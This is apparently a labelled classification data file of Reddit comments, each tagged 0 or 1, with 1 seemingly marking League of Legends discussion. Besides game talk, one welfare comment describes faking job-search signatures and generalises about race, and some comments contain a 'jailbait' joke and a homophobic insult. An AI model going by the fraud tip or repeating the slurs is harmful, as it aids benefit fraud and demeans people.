1	Well when you don't even catch half the things the player is doing and don't even evaluate his plays himself then you aren't gonna get anywhere in the first place. But it's all down to someone's opinion really.   For the general New/Bronze player it helps to know the basics. Which are normally not talked about on streams and are more focused on by gold/plat players because they know the basics.   But like I just said now and before I'm talkin about bronze players which make up a majority of the league community. Of course it may be different for others.   One last thing . People tend to pick up idiotic habits from streamers more so from anywhere else because they don't even try to understand whats going on. That's why you see AP tryndameres who don't even split push and try to team fight and etc.
1	I honestly didn't care about the whole situation, as long as people will get their prizes. There still isn't enough evidence either way to suggest its true one way or the other, ultimatly I give some credence to the suggestion that many prizes havn't been sent out and have been continually delayed. At the same time I never felt it was fair to grab my pitchfork, because I know how razer sets up contracts, and if protato was committing fraud, then its going to be lots of civil and potentially criminal legal problems, not problems from reddit that he faces. Razers lawyers alone would mount tons of civil claims.
1	I don't mind about them being better or worse - I want them to be gated by mana and not « chalice-gated ». Mana is quite irrelevent right now (was before 4.20, I haven't had the chance to play since the patch). I'm not asking for a DotA-ish mana gate-ness (though Riot  just did  change raw mana regen value to base percent regen).   In a world where mana and manaless champions coexist (more generally resource and resourceless champions) it is normal that resource-based champions need to be properly rewarded for managing their, well, resource, while champions with free spell casts (I'm looking specifically at Riven, Yasuo and Shyvana here, though Mundo comes to mind too.) suffer from some caveat in their kit (Be it the sorrowful « they're melee champions !!!111 » excuse or anything else.). In that regard Garen must be the best example of how a resourceless champion can be balanced : he suffers from actually high cooldowns, can be kited very easily, and though extremely powerful early (since he doesn't use any resource and has high base damage) he falls off hard late game.   However, when you introduce Chalice into the equation, which completely removes/d the mana gate, you basically transform all the mages into non-resource based champions. There should be a price to pay for that and that price shouldn't come with lots of bonus free stats (Magic resist for instance, then a massive 20% CDR when upgraded to Athene's.). Right before 4.20 the price was 880 PO, now it's 1000 PO and from OP's calculations the regen was heavily nerfed.   What I mean by that is this : if you're playing a mana-gated champion, and you want to become a resource-free champion, you have to  commit  to buy Chalice, not  Well I'm just grabbing Chalice while I build Void Staff .   >
1	Champions like Karthus and Sion are really hard to play to their full potentials if the game is frozen upon death for upwards of 4 whole seconds. It's still a problem regardless of it doesn't affect  most  scenarios.   Also, not seeing what finished you off makes it hard to properly assess the current situation in the game (e.g. what does damage and what doesn't, if the enemies continue to chase your team or if they back off immediately after killing you, etc.)
0	When I read the link I was looking for some form of
1	or dont pick a champion just because you think you are good at that champion. If it is a lane that isnt in your favor you might be better off picking a champion that does better in that lane.
0	Can someone tell me where this "tea partiers are probably terrorists" talking point came from?   Because I can't for the life of me find a shred of logic in the idea of self-professed patriots committing a terror attack... in Boston... during a marathon. That makes no sense on so many levels.   First and foremost these are mostly islamaphobic people that hate muslims because they think they are all terrorists that want to attack America. But apparently its even in the realm of possibility that they would do exactly what they hate to their own country... which would only achieve getting the public on the side of the government that they dislike when people would find out it was them.
0	During my freshman year the foreign language teachers got into a prank war. At first everyone was separate, but quickly two sides formed, French and German (didn't see that one coming, huh?) versus the Latin and Spanish. Anyways, Magister Amocasa (this is fake Latin for "love shack" a play on my teacher's real name "lovette") decided to raise the stakes, he shared a storage room with the French teacher who had left the keys to her very expensive car in plain sight. He parked it about a mile up the road before walking back and replacing the keys. Needless to say, the Latins won the war.
1	What rank are you? I feel you don't play against good opponents, and in regards to your
0	That sounds plausible on the surface, but I would submit to you that the physical embodiment of a word is just as culturally constructed as the word itself.   If you say the word 'tree' for example, the type of tree that each person is going to think of could vary dramatically from place to place. An Oak is very different from a Redwood which is very different from a Kapok tree (common in the Rainforest).   These perceptual differences are also present in onomatopoeias - words that are supposed to sound like real world sounds.  Think about all of the different words just in English that describe a dog's bark.   Well, did you know that in China, dogs don't say "woof" they say "mung"?   There are tons of variations on how we linguistically represent acoustically similar noises across cultural boundaries.   So why would sign languages be any different?   Think about it this way: there is a lot of letter-spelling in ASL, but what if you live in a community that speaks Italian? Or Japanese? Or Russian? Why would you expect a group of people who have no natural exposure to the Roman Alphabet to use that as a basis for their communication system?
1	Something pretty close happened to me. I was in the lobby for soloq when all of the sudden the game just kind of broke and froze after the first pick was made. We could all still chat and everything, but there was no ability to select champions. After a while playing the waiting game, someone finally dodged and we were ejected from lobby like usual. However when I went to queue again, a message said something like, "this account is already in a game." So I shook it off and re-logged. When I pressed the login button and entered what seemed to be the client, the "You have recently left the game, please reconnect." notice showed up. I was very confused at that point, and clicked reconnect. Instead of reconnecting, though, I got kicked off the client. The whole rest of the day I couldn't play. Good news is, everything was back to normal the next day. No leaver penalty or anything.
1	okay hold the phone all you negative people. I am a huge fan of being able to assign runepages to champs specifically and being able to refund each tree individually. these are awesome changes. I am a fairly consistent player and this is just plain awesome. just because you are a casual player or dont like the change doesn't mean you can just shoot this down. if it does bother you so much maybe this can be an advanced player setting in the options?
1	I find that bottom lane is more about building what you want for the team more than countering their lane, and is picked for more of a long term strategy.  if you want an early game monster to secure towers and dragons before 20 mins, i would go cait or graves, knowing that late game may be harder.  if your team is built around late game fights i would grab trist or ashe.  if your team is CC heavy and you need a hypercarry, grab vayne or kog.  your support role should reflect how you want your lane to play in the short term.  sustain is great for ensuring that you will get CS, but lets your enemy get CS easier too.  running a kill support (blitz, leona) or a harasser (nid, yorick) is great for denying CS and getting kills, but can lead to deaths.
0	It's not being homosexual that Catholicism does not agree with, it is the act of non-procreational sex. Of course, if two people engage in homosexual intimacy, then it would be non-procreational, and only recreational. Of course, Catholicism does not agree with recreational sex at all, as this applies to heterosexual relationships. And then there's the point about sex outside of marriage - you guessed it, Catholicism doesn't agree with that either. But don't think Catholics believe that being homosexual is wrong - Catholicism isn't  THAT  backwards. I myself am an agnostic, but Catholic by upbringing - I decided to be baptised and confirmed myself when I was 10.
1	Faker was the most impressive player in mid position in 2013. If you DID watch all his plays in the most competitive league in the world, you cannot help choosing him the best mid player in the world 2013 ~ mid 2014.   Even though Pawn took his place after mid-2014, the best mid in the world position, he still remains as a Legend himself. I believe he and SKT will be back in S5 Worlds.   The KR playoffs are a terrible example to analyze; Faker had no choice but to make overly aggressive for a slim of a chance to win any game against White. And of course White knows that, so hello Dandy camps. SKT T1 K was dragging Faker down so much that the entire burden of carrying was placed on him and Bengi does nothing at all to relieve that pressure so Faker, in essence, dies in his desperate efforts to do something about his team. There is no player that can really rival Faker right now. Not dade, not Pawn, not Mata, not Rookie, not KaKAO. The combination of his insanely large champion pool, his incredible mechanical proficiency on every one of them, his overall game knowledge and playmaking/decision-making ability (provided he is not in a team such as SKT T1 K that was on a pathetically horrible tilt and downward spiral into irrelevance during the later stages of Summer) makes him just an entire tier above. Dade has his playmaking strengths and his proficiency on select champions, but lacks the ability to fully adapt to some meta picks (such as Orianna) nor does he have a very large champion pool. Pawn adapts to meta picks and has a decent champion pool but lacks the overall playmaking ability nor the same high-level mechanical proficiency on every single champion he can play.   SKT T1 K is just so pathetically weak right now (well, they just released Pooh and Piglet and I think they should/will kick Bengi but we'll see) and Faker has to carry them so hard (Impact can only do so much with Faker and a jungler like Bengi). If you actually pay attention, Faker was actually almost single handedly carrying his team in S3 Worlds as well. It's just that back then assassin champions were the shiz (plus Gragas and Ori), and he had an easy time ripping through a team with those champions. Now, it's a lot harder with a lot more focus on utility mids like Lulu, Zilean, and non-aggressive mids like Ziggs. When he does get on an assassin everyone camps him while Bengi does absolutely nothing on the map elsewhere. Yes they did try to camp Faker in S3 too but 1) Faker's teammates were still somewhat stronger back then compared to now so other teams still have to shift their focus to other lanes sometimes, 2) even though assassins are making a semi-comeback they still are a lot weaker in the laning phase due to the surge of long-range harass champions and increased jungler impact (while, of course, as mentioned, Bengi does nothing to counteract people like Dandy).
0	Do not delete anything .  I am a firm believer that too many people have easily obtained or renewed their  licenses in America and are operating rolling death machines , ignorant of the fact that at any second they can take a persons life by driving in unsafe conditions beyond the limit of their own reaction ability  or their vehicles  responsiveness on the road due to environmental conditions  . I totally disagree with the victimized depiction of the woman who was operating the vehicle .  I don't really want to get into the sciences of stopping distance based on her vehicle and the speed in which she admitted to be traveling (which was in excess of the maximum safe driving speed for the road she was traveling on) The simple fact is I have been driving for almost 14 years and have only been in one accident that was unavoidable  where a car I was well aware of turned into me with a 5 foot stopping distance from an oncoming lane , while I was traveling at 40mph in my restored 1969 Datsun 510 with only tiny drum brakes .  Being aware in that moment is what meant the difference between T-Boning his 2005 350z and possibly  injuring his 50+year old wife in the passenger seat . Due to instinct and watching the road diligently regardless of how much "right of way " I had , I was able to hit my brakes just in time to avoid his door panel and clip his rear bumper .  Both parties were fine but my classic car and my love for being a grease monkey died that day .  Needless to say being an aware driver has definitely helped me avoid accidents and possibly saved a life or two over the years . Operating a machine that can kill should be taken far more seriously than it is . Using the judicial system as a leverage point by counter suing for intangibly provable damages  should be 100% illegal. It boils down to personal accountability and allowing the court system to be a tool in shirking responsibility .  It ties up the entire system for people who have honest  legal matters to attend to.  If she did not drive over the recommended safe speed for the roads and was aware of her surroundings this would not have happened . I haven't seen a bicycle that can travel faster than my eyes can . And if I can't see 5 feet in front of me , I drive like I can't see 5 feet in front of me .  She is as negligent as the mother who let's her baby drown in its bath water in my eyes .  Cars are roving death machines able to kill tens of people in seconds .  It's real life mad max out there minus the spikes and crazy Tina turner , people just don't realize it until they have a lawyer coaxing them into a legal battle to limit damages to their future .
1	I think you're underestimating both the statistics and the effect an individual player has on the game.   Let's say you have a player with 1600 true elo. If everyone else was at their true elo, he should have a close to 100% winrate, but since they're not, his winratio will approach 50% the closer he get's to 1600. Now, this player would never be exactly at 1600 for a long time, even though it's his true elo, instead he would jump up and down from 1400-1800 depending on his games.   Now imagine this player, and then ask him "What do you think your true elo is?" I doubt he'd say 1600. He would probably say "well my top elo is 1800, but trolls made me loose a bit, so now I'm closer to 1600" Because in his mind, all losses below 1600 is (correctly) due to other players, but when he wins, he wont think "I totally got carried this game" because he'll focus on what he did well, because that's how the human brain works.
0	This happened to me.   Was laying in bed, tossing and turning, generally trying to sleep and my phone chimed with a notification.   It was an email from a local airline, asking for feedback over my recent flying experience with them.   Trouble is I hadn't. I had apparently booked tickets to Singapore some 6 months before and then forgotten about them. I was supposed to have flown the day before.   Bricks were shat that day. Those tickets were non refundable and non cheap. :(
1	Not that DaGhost is properly illustrating the fact, but if I remember correctly, after the first few steam sales, Gaben produced some graphs and stats showing that the net profit from the sale was greater, because way more people bought the games. I think a lot of the games industry operates with far too high costs due to old models based on how expensive electronics were back in the day.   Skins play into this; I bet if Riot halved the prices of all of the skins, they'd get more than double the sales to compensate. I really want to deck out my cho'gath as a gentleman, but I'm not going to pay $13 to do so. I've spent somewhere between $30-40 dollars on Riot products thus far, so I'm not opposed to buying things from them, and in fact, I think it's a great business model, they just need to work on the pricing. Think about it: If nocturne had been ~$5 at release, how many of you would have bought him? I would have GLADLY paid the price of a sandwich for maokai when he first came out.
0	Since there are some posts by a welfare worker above, I'll go ahead and add some of my experiences with it:   >Fraud is common and not detectable   >Incorrect! In order to be on Welfare in most states you have to sign away most of your privacy. Therefore the caseworker usually knows tons of things about you from all the tax, credit, police and immigration reports they get on your average recipient. Also, the welfare investigators are screened for their abilities and are usually very good at their jobs, as well as being stone cold SOBs. And that's just for food stamps!   I agree with the privacy part, they'll ask you for damn near everything including the size of your underwear if they could. The latter part, not so much. In Cali, most of the social workers were bleeding hearts who had a small chat with the recipient if they were having a home visit and would quickly sign away whatever reports they had. It wasn't uncommon to shuffle away extra renters, family members, even husbands who were obviously helping them financially away and the investigator none the wiser.   For example, I knew/know someone who has 6 kids was getting roughly $1000 in cash benefits plus $1500 in EBT benefits for nearly a decade or so, with a husband making $40,000 a year who only recently got caught after the husband had a severe run in with the law and it all came to light. (In case anyone is wondering why I didn't report for fraud, I didn't know them, only their extended family and this shit is talk of the neighborhood).   This is just my experience, this shit wasn't uncommon and worse was when you met some family who didn't qualify for miniscule reasons while some obviously fraud ridden family did, for example mine: recently divorced, only making min. wage but didn't qualify because my her husband's former income apparently also counted against her but that's old history. And of course, it depended if your social worker actually liked you because if you didn't, you were better moving off to another country and reapplying because the investigators would find ways to screw you over.   In GA where I saw the most rampant abuse for example, seeing late model Lexus, BMW, Mercedes-Benz, Grand Marquis with all the car trimmings you could imagine walking into the DFCS office there didn't seem to be any checks at all  especially  if you were black (I lived in a black majority county, no racism intended here just calling it how I saw. For example, it was pretty common in the Mexican-American community in GA to not bother applying since you would get denied no matter what).   >TANF (cash) clients jump through way more hoops than those I listed above; they have to see specialists who force them to search for jobs. If the job search forms are not completed to the liking of your TANF worker, they sanction your cash payments until you do, or just kick you out of the program. Welfare recipients, naturally, cannot bribe these workers who are making more than 40k with great retirement and other benefits. Clients are poor and don't have bribery money, for the most part.   Absolutely, usually for TANF (Temporary Assitance for Needy Families) you have to submit to monthly social worker visits or have to visit them in your local branch office (and your state might even require a drug test, hello Florida!). You must also file monthly, or tri-monthly reports on income, assets, and all that other fun stuff. I'm not sure why they add in bribing since I've never heard of it growing up around it, must be anecdotal or a question they get asked often. As for the job search, one evening with a phone, the name of the supervisor, and some fake signatures from varied family members are easy enough to fake on the job search report sheet (working as a supervisor at a mechanic shop, this shit was common as all hell) and the investigators rarely follow up unless the person really screwed up somehow.   >Women get pregnant to become single mothers for welfare checks   Absolutely true, but the system has an odd way of feeding the person deeper into the program to the point the person just relies on the welfare checks of subsequent children to keep up with the bills. It is by far not a glamorous life and one I would suggest you do NOT pursue. You'll live, but that's it. Forget anything fun since you won't have enough money for anything.   >Older people on welfare didn't plan well.   Can't comment on this, my grandmother herself was on SS and medi-caid after a lifetime of working her bones to the nub.   >I literally (no, not figuratively, literally) hear caseworkers say every day, "If the clients just had a part time job, they'd do so much better than they are now."   To actually qualify and to keep qualifying you usually need to work anyway and the jobs programs will help you in some form or another. Seems more like their agents just kept signing away the aid forms which as I said, is sadly common.   > Foodstamps don't cost the government that much and drive local businesses (you may not see it, but your grocery store takes a lot of EBT--foodstamp--money. People are just discreet about it.) But if you'd rather have your local gas station attendants, newspaper stand vendors, fast food workers, landscapers and so on all starve--well, I guess that would save the government some money.   Absolutely true, most of the money these welfare recipients goes into two distinct expenses: Rent and Food, nothing else. Sure you'll hear some poor family with an xbox or so but pawn shops are damn near anywhere and any idiot with half a mind can order a used one off of gamestop or the internet. The welfare system has been come a jobs program by another name. For example, walking around Cali every store these days accepts EBT since there is just so much money to be made from it and half the local run stores wouldn't even exist without the benefits. Same with my old home of Georgia, even the local liquor stores took it.
1	I love how you believe yourself to be thinking objectively and analytically, but you really aren't. How many different aspects of athleticism required in a sport do not determine how much more athletic one person is over another.   Also you answer questions that you don't understand. "The sprinter is more athletic than the marathon runner because they require speed and power and you ONLY need endurance to be a marathon runner" I'm gonna call bullshit on that--look up some stats for any professional marathon runners, and they can run 2 times faster than the track star at your high school...for 100 miles. That requires a delicate balance of speed AND endurance...both are crucial.   Getting away from specifics, let's use some hyperbole to close this out. I'm by no means a professional sprinter. But say I'm sprinting at my sits-on-my-ass-playing-league-all-day speed. According to you this takes speed and power. I mean I AM trying. Compare me to the aforementioned marathon runner. Who is more athletic by YOUR standards?  I  need speed AND power but that little wimpy shit just needs endurance. 2 is more than 1 so I am more athletic...but I'm not.   You also have to factor in how MUCH is put into the different aspects of athleticism. Weight lifting requires lots of strength. Marathon running endurance. Sprinting requires Speed. They are all different attributes, none more important or impressive than the other.
1	OP doesn't understand that different people structure arguments differently. Thorin doesn't want CLG coach to blast his own player. He wants CLG coach to explain why the person who was suppose to perform at a certain level failed to do so, which, in retro perspective, potentially cost them Bo3 agaisnt TSM
0	It's not easy at first, but it'll come with time and practice.   As meaningless as small talk can be, it's important to show interest. Think of the way you interact with friends, family, people you know. Just listen to them speak, speak how you feel, and be yourself. The biggest thing I've noticed is small talk leads to bigger, meaningful discussions. That may not always be true, but when you truly begin to understand the way a person feels, and the way their mind works there is no feeling I've ever found that equals it.   But I digress, to effectively make small talk you can do a plethora of things. This is generally how I strike up an interesting conversation:     The good ol' "how are you?" is a classic, but hardly ever equates to any form of conversation beyond "Fine, you?" At which point you offer your own reply and the conversation has to be carried by you once again. Still a useful way of opening up communication.        Introduce yourself, and allow them to do the same.        Follow it up by asking almost anything you do not know about them (within reason of course). Depending on age range it may be what they study, hobbies, taste in music, job, where they're from, the list is endlist. Just don't be overbearing. This is by far my favorite and it really makes an impression that opens the door to other conversation down the road.     I generally ask these beginning questions which, more often than not, lead to whole other conversations:     Are you from around here or somewhere else? (I live in a college town so many people move here)     Do you go to college here? If yes, What are you majoring in? If no, downplay the fact that you've asked that they may be ashamed that they aren't and change subject       -If they mention a job, I may ask them about how they enjoy it, or how long have they been doing it.     From here I'll talk about music, hobbies, all the usual stuff.       If you ever find someone who shares common ideas/hobbies/interest as you try to keep those commonalities in the foreground of the conversation. This will make time pass before you know it (if that is your main goal), but being genuinely interested in the conversation shows the other party of this interaction that you are not viewing them simply as another face, but as another person.      So next time you're at the store, the gas station, wherever it is you go, ask that older woman behind the counter how she has been today, give that person you make eye contact with a simple smile and a tip of the head, just let those people know you acknowledge their existence. It's not hard to do and it may make all the difference in the world to that person.   At the end of the day we all want to feel human, and that is something I believe we all deserve. Through even the smallest interaction you may give that person that feeling of humanity, and you may gain it for yourself.
1	Want to know about it, but midterms get in the way of reading this stuff.....
1	Your points regarding maximum efficiency/fatigue aren't necessarily that important because a lot of people (myself included) wouldn't consider one's 'true skill' to be their peak, but instead what they do consistently.  LoL in this regards is like a marathon.  The better person isn't the one that can sprint fastest, but the one that maintains the best average speed.  Although from a psychological perspective it definitely has something to say, in that the within-player variance and a self-aggrandizing tendency would mean that people see themselves as their peaks more so than they would others; which contributes to the perception that one is in an 'Elo-hell' and far more skilled than their peers (when they are in fact just as horrible).   Moreover the point about snowballing isn't necessarily that pertinent.  If after a bad session you can 'reset' yourself, then you should be able to 'snowball' yourself back up to a higher bracket during your next session, simply because the players will be much more easier to snow ball off of.  If you  cannot  reset, then you are now a worse player and your past skill is irrelevant (at least regarding current ability, but - as per my previous paragraph - it would still be relevant for perceived skill).  This is something very different from 'being stuck in Elo-hell' which is a supposed situation where a player is stuck with low skilled players despite their  current  skill being far better.   As for your mathematical argument.  I think you've misinterpreted the OP's argument here.  Elo-Hell is more than an idea of a bracket with low skill players (and no one is trying to disagree with that).  When the OP says "There is no Elo-Hell" what he's trying to say is that the concept of being stuck in a bracket because of OTHER players is false.   Your calculations say nothing to support nor disprove this point.  Your calculations show how the Elo system work, whereas the OPs post (if you actually read the link) is about player influence probabilities.  If you  are  trying to argue against that contention of his base on Pascal's triangle alone, then I think you need to seriously look over your calculations, because your current formula doesn't factor in the very probabilites which the OP was talking about, or even the fact that in the second game you should  theoretically  (because of Elo-matching) be playing against people that had the same win/loss outcome in the first game as yourself, so the compounding effects are irrelevant.   You've taken and argued against a very literal interpretation of the OP's post; one that he, and almost no one, is trying to make.
0	K so this thread is huge and this is relevant in more than one comment thread... so I'm just gonna shove this in here and watch it be buried. Yes, as a hivemind /r/atheism can go a bit overboard or be generally obnoxious, overbearing, and intolerant and thats  not right . However, a place where a community can vent such frustrations is quite therapeutic for those of us who had parents/communities which were obnoxious, overbearing, and intolerant towards atheism. I was MAD at religion for a long time and venting on that subreddit helped me keep it away from my loved ones whom I respect and gave me the tools to express my beliefs to them in a rational and prepared manner. For myself, and probably many others, that sub is the one accessible place where atheists congregate. We can be arrogant, and like the rest of you need to be put in our place or corrected every now and again, but usually you will see that voice in the comment threads in the sub its self.
1	If TSM lost to DIG yesterday they would be getting a lot of shit talk from Monte & Thorin (see: every episode of summoning insight, and their respective twitter feeds).  Not the mention the attitude of doublelift "If you don't make it to worlds you're nothing"  "I'm the best ADC in NA"  "I'm better than Vasilli"
0	I thought you had it right the first time.  Her principal understands discipline in way she can't.  Probably because she's jailbait, because she has a principle.  Unless her principal is your principal too.  In which case, kudos on banging the principal.
1	So many things wrong with this have already been listed, such as it being abused and leaving becoming much more common, but a big unsaid one is this: what about the other team?   Yes, it's definitely frustrating to play 4v5, but the game is still playable, and given that this could only apply to normals in the first place, it's entirely just a game. So while one person leaving might make the game less fun for the 4 people on that persons team, more people or all people leaving flat out would ruin the game for everyone. It's a matter of what's best for everyone, and slight negativity for four people is far less worse than complete abandonment of the game for everyone   The only possible way I see this being implemented in a balanced way is that after X minutes, a game wide vote could be taken about allowing people to leave freely, but even then you still have the other issues of ruining for the minority and increased leaving
1	Picture it this way [ NA (3) + EU (3) = 6 ] & [ SEA (2) + China (2) + Korea (2) = 6 ] but then you add a extra team to korea which is why they have 3 now because of all-stars.   Hope that makes it have a little bit of sense.
0	Or you have a job where you are stuck in a lot of meetings (Like myself. Yay!) and taking out your phone at all is a big no-no. I try to explain to my friends that if you text me during work hours there's a 90% chance I won't respond because I can't. Normally I'll respond back after work, but people are impatient and take it as a slight.   Personally, I've always viewed text messages like emails in that there's no expectation of immediate response, I simply expect a response when the person can or wants to. If something is important, I'll call you. There's a million reasons why someone can't or won't respond to a text right away and, at least with me, only 5% of the time is it because I don't want to talk to you right now. Why doesn't text messaging have the ability to set your status as "Busy" so people know not to expect a response for a while?
0	2 years of commenting for one.   But there's really easy ways to get  comment  karma if you want to abuse the system. I don't know why you would do it since this shit is meaningless, but here's what seems to work:     Understand reddit memes (phrases, images, trends) then parody them on popular subreddits (gifs, pics, adviceanimals, funny, etc). I've gotten so much karma just from replying with a relevant .gif or .png from imgur to a highly rated comment.     Circlejerk is easy karma if you know what stupid things redditors flock to and upvote all the time and then want to parody.     If a post is all about how amazing Taco Bell is, don't go in there and try to create an intelligent discussion about Chipotlé. This is just an example, but in actuality reddit is really cliquey and you're probably just going to get downvoted for not towing the line more than often.         Don't explain how you get karma. This is usually met with downvotes.     Avoid /r/politics     The most important thing is timing. I've made stupid replies to the top comment and got 1500 upvotes simply because I was there first. On the other hand I could get -200 karma for not knowing what opinion was safe to have before the thread got popular.       Note there's always exceptions, like for instance smaller subreddits won't tolerate your generic karma grabbing bs in favor of intelligent or relevant discussion.   Once you start trying to gain karma you realize right quick how faulty the upvote system can be.
0	That's because at the end of the day, Reddit is just a circlejerk. The hive mind only wants to toot its own horn and compliment itself. That's why there's so many reposts, and reposted comments on those reposts, and reposted replies to those reposted comments on those reposts. Once you spend enough time on Reddit you can easily predict the type of post that'll be on the top of each subreddit, exactly what everyone on the comments will say, the poor down voted soul who dared to have a different opinion, and about how long till someone will repost it again for karma. The upvote down vote system of Reddit is a very nice idea that if people followed it correctly would simply hide irrelevant comments but instead people use it to silence anyone they disagree with even when that person is right. And then because people have to deal with the others who treat it like that, they'll start slowly changing how they post simply to get more upvotes and have more people "approve" of them.
1	Uhm I think this is pretty BS tbh. First of all, it's not like Morello decides who nerfs what. There is a whole Team behind that that thinks about that, and the only thing Morello does is adjust NUMBERS he doesn't actually have to choose who gets nerfed - ofc he can suggest something.   Furthermore, the nerfs you talk about are all reasonable. Akali got overnerfed, no doubt about that. But that's for a reason - Akalis ult is a non skillshot, 800 Range Gapcloser that refreshes. Compare that to Diana: Not only does Diana have Mana, if she wants to use her ult more than once (remember, Akali has at elast 3 free jumps), but she needs to hit her Q, which is a skillshot. I assume that they are going to buff Akali in some way, but tbh, it's really hard to think of a good way to buff Akali atm, that's why Riot made her UP atm - to buy time to think about how to make her good again.   The Hecarim changes... Hecarim is strong at least, maybe even OP. A tank with a heal and an AoE Nuke that scales of AD and an long range, cc ultimate? The only reason he is not used atm is because he is not good in 1v2s and there are junglers that outcalls him (Zac, Elise, Nunu, Jarvan). He is still strong, maybe even OP, even after the nerfs you mentioned. He is the only Jungler I can think off that can 1v1 pretty much anyone. And definitly the only jungler who can split up the enemy team in 2 groups with his ult.   The oracles changes were fine too. It helps the gameflow since Supports7whoever has oracle don't have to pay really careful anymore with Oracles. Also, they got explorer wrad into the game, they got sighstone into the game and they limited oracles to 5 min - after 3 buffs to Warding/Vision, a nerf to the same seems apropriate.
0	it's not the bool statement, it's how you're checking it.   if(foo == true)    is functionally the same as   if(foo)    while we're nitpicking:   *improper indenting and that horrible style of bracketing.  I mean yeah K&R is a preference, but it's a pain to look at, and if you had done more traditional "but it wastes one line!" bracketing, you would have immediately noticed where you forgot a closing bracket. Your code doesn't actually compile because of this.   *using namespace std   *using std::cout instead of printf (okay, that one's also preference, but goddamn do I love format specifiers)   *using endl instead of \n   printf("some string\n"); //is the same as std::cout&lt;&lt;"some string"&lt;&lt;endl;    *not taking advantage of c++ polymorphism and using a branch nested in another branch, even though your code already implies you've got classes set up to handle different types of girls   BaseGirl* girl = inst; girl-&gt;ReactTo(you);    these two lines could accomplish the exact same as the mess of "if" and "else" statements you wrote out, provided inst was a pointer to a type that had properly inherited from abstract BaseGirl class
1	Richard's article appeared entirely biased because it comes from a place of jealousy over how much money the pro players make. > Perhaps he too would spare a thought for those of us in the industry that receive none of the benefits and all of the downsides. I could happily tell him a thing or two about the nature of how far people will go on the internet to make you feel miserable and I don’t have a fraction of the money he’s made for doing my job.   Richard seems like the kind of person who would say movie stars deserve to be constantly harassed by paparazzi everywhere they go simply because they make millions of dollars. The suggestion that E-Sports pros and traditional sports stars are equivalent is a joke. Some of these LoL pros are only 17 years old and don't have the same buffers between them and the public. They don't have the media training and team PR staff handling their social media accounts. Naive statements like "ignore the haters" from people who can't begin to understand or empathise with the situation these players are in also do very little to help. The idea that verbal abuse and negativity is somehow cancelled out by larger amounts of positivity and praise is also laughable, as if human feelings worked like Reddit karma. Finally, I would like to address this quote:  > The gist of this message? Well you don’t need to be a Windtalker to read between the lines. It is essentially a ransom note – “be nice to us or maybe we'll be around less” – and it is one that seems to completely ignore the double edged nature of being a recipient of fandom.   Is Richard trying to imply there is something wrong with desiring to experience less abuse? Imagine applying this kind of logic to a woman who is abused by her husband. Even though he provides for her financially, she has the audacity to threaten spending less time at home until he stops beating her.
1	I just don't understand how they work on Irelia when Udyr and Yorick need some serious balancing issues taken care of in lane.   You want to talk sustain problems? Fucking udyr is a terror. Turtle and just smacks away for health AND mana?! what the fuck is that! :[
0	I used to work for the police when I was 15-17, so in high school. We pretty much got paid 15 bucks an hour to drive around with them, they'd hide behind the convenience store or whatever, and we would go in and try to buy cigarettes/Indian reserve cigs. The title was "test shopper" and the whole point was to go in and attempt to get vendors to break the law. You are always required to ask for ID. There were even some vendors who asked for ID, and we would have a fake that clearly said we were under 21. Some vendors just pretended to look at the ID and we caught them that way. The cops would go in afterwards and be all like "you just sold cigarettes to a minor bitch, see ya in court" and from what I remember almost all the people that sold to us got fired... Kinda felt bad since a lot were just college kids working summer jobs. But hey, looks great on a resume so yeah
1	Sky I know you're gay, but don't suck Dyrus's dick this much dude.   Was he good ? nah, could he be better ? yes. Marginally.   Why wouldn't the strategy of camping a single player never work against any other team?   What has lead TSM, a team that I am sure strategies more than you think, decided to stay with this strategy of welp, its dyrus top, he'll be camped and lets hope team can recover over and over? Exactly. They know they cannot back him up with a jungler, because the 2v2 will go south due to his abilities/inabilities.   Standing up for people is cool, I get it, it's noble, but criticism has to be done in order for a team to get better.       Dyrus has to either step up both mechanically and decision making or he has no place in a competitive team.     Bjergesn needs to be on play making champions, cho'gath isn't one. Zed is one, Leblanc is one, heck let him play Syndra if you want a control mage.     Wildturtle is pretty good mechanically, but goddamn does he suffer from poor decision making, let him be coached by Bjerg or someone who understands the game more than farm and orbwalk and land skillshots.   Locodoco, please please please please, DO NOT Draft a team based on what your opinion is, you literally forced Bjerg on Cho 2 games, and lost because of having your star player on an utter shit champion. Let your team develop their playstyle, copying Koreans wont work, wanna know why ? you dont go through lengths that koreans go (replacing players instantly due to performance) so play your game, not imitate their game and fail at it.
0	Clearly you've never been punched in the eye, otherwise you would know you can't see shit after getting punched.
0	Or required too much reading. Redditors prefer
0	That was  stupid. I'm wondering if I'm being trolled or not.   >Wow. Just wow. So much sexism.   Yeah, well, how about you pinpoint it? With a quote from me and an explanation what it is that is sexist about it. Otherwise it just looks like you've got nothing in terms of argumentation and you're out of better insults, too.   >I have never met a woman like this.   ...?   And I have never met a male my-little-pony enthusiasts. Doesn't mean they don't exist.   Yes, it's rare, but I have met a couple women like this. Go out more, I guess?   >As a woman I am horribly offended   Pffhahaha.... Oh, you're too much.   > by this gross generalization which is just that: a generalization (and therefore carries about as much weight as a stereotype).   No, this is literally the opposite of a generalization. Because we were not making a general claim! We were just talking about a couple women we know, 2-3 out of maybe a 100 if you want me to make up a statistic real quick.   > Not to mention the complete lack of anything scholarly making this more accurately: "one dudes untrained opinion"   Absolutely.. these are just wild speculations as to why these women do this. Nobody claimed any real credibility here. I also submitted my own explanation as to why they do this (
1	1.) Anivia - broken zone control and utility, and Crystallize may be the single best non-ultimate ability in the game.   2.) Karthus - I don't need to explain much. He's overpowered.   3.) Morgana - What can I say of Morg that we don't all know? Free-farms, pushes like a beast, roams well. All-around great AP mid.   4.) Kog'Maw - Nerfs didn't hit him very hard  at all . I couldn't decide who I wanted for third between him and Morgana, but I feel like her CC and general ability to survive any lane puts him a notch above.   4.) Ryze - Forgot this fucking monster for a moment. Tying him with Kog'Maw because they both have beastly lategames. Ryze gets his shit pushed in like a prison inmate, though.   5.) Kennen - Yup, he's Kennen alright.
1	I agree with this post. There may be "OP champions", but given time I do believe there are possible counters. For instance, most of the adcs arent viable to keep up with the other bursty champs, but I laned against a sivir and maokai combo that poked us down to nothing. He was able to protect her and she put out some damage.  We have a hard time breaking the meta, but with time, any crazy combo can work. New limitations with each champion have been established. We just have to get used to them.
